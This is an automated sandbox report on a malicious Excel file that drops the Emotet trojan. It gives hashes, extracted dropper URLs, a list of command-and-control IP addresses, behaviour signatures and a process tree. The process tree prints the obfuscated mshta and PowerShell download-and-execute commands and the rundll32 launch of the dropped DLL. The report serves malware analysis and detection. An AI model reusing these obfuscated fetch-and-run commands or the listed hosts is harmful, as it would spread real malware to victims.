Analysis

  • max time kernel
    117s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 03:22

General

  • Target

    tmp2gk55_pm.xls

  • Size

    35KB

  • MD5

    0e5337dabc5bd47c306f7c58244b1fb7

  • SHA1

    7d924b991f7b5628fa92ccba8f0aebc9bd74f3a2

  • SHA256

    f1efeeda1b91b619cfbc4426321258de32311bfa52493314b01a8219547ce722

  • SHA512

    e5245aa07d872e8ecfaa1655a8b6747737e5eaf06fb31f3d9e70acc2a1e0b882fa0b3f73bdf6a33ff106e9cfcc54b8a3cf5e0f486a1fcbb96335f0809b64388b

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tmp2gk55_pm.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3144
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3176
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2108
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3836
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1696
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:636
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oolyxokl\zvvvsxymppnor.ztk",SHDfK
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1744
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oolyxokl\zvvvsxymppnor.ztk",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2400
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2964 -s 1652
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4064

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • memory/636-345-0x0000000005520000-0x0000000005547000-memory.dmp
    Filesize

    156KB

  • memory/636-351-0x0000000005720000-0x0000000005747000-memory.dmp
    Filesize

    156KB

  • memory/636-347-0x0000000005580000-0x00000000055A7000-memory.dmp
    Filesize

    156KB

  • memory/636-343-0x00000000054C0000-0x00000000054E7000-memory.dmp
    Filesize

    156KB

  • memory/636-341-0x0000000005360000-0x0000000005387000-memory.dmp
    Filesize

    156KB

  • memory/636-339-0x0000000005260000-0x0000000005287000-memory.dmp
    Filesize

    156KB

  • memory/636-337-0x0000000004D80000-0x0000000004DA7000-memory.dmp
    Filesize

    156KB

  • memory/1696-334-0x0000000004290000-0x00000000042B7000-memory.dmp
    Filesize

    156KB

  • memory/1744-348-0x0000000004E30000-0x0000000004E57000-memory.dmp
    Filesize

    156KB

  • memory/2108-296-0x00000237B6CE0000-0x00000237B6D1C000-memory.dmp
    Filesize

    240KB

  • memory/2108-285-0x00000237B66D3000-0x00000237B66D5000-memory.dmp
    Filesize

    8KB

  • memory/2108-275-0x00000237B6670000-0x00000237B6692000-memory.dmp
    Filesize

    136KB

  • memory/2108-312-0x00000237B66D6000-0x00000237B66D8000-memory.dmp
    Filesize

    8KB

  • memory/2108-284-0x00000237B66D0000-0x00000237B66D2000-memory.dmp
    Filesize

    8KB

  • memory/2108-307-0x00000237CF380000-0x00000237CF3F6000-memory.dmp
    Filesize

    472KB

  • memory/3144-115-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-119-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-116-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-118-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-117-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-129-0x00007FFDFE4D0000-0x00007FFDFE4E0000-memory.dmp
    Filesize

    64KB

  • memory/3144-128-0x00007FFDFE4D0000-0x00007FFDFE4E0000-memory.dmp
    Filesize

    64KB

  • memory/3144-390-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-391-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-392-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB

  • memory/3144-393-0x00007FFE01550000-0x00007FFE01560000-memory.dmp
    Filesize

    64KB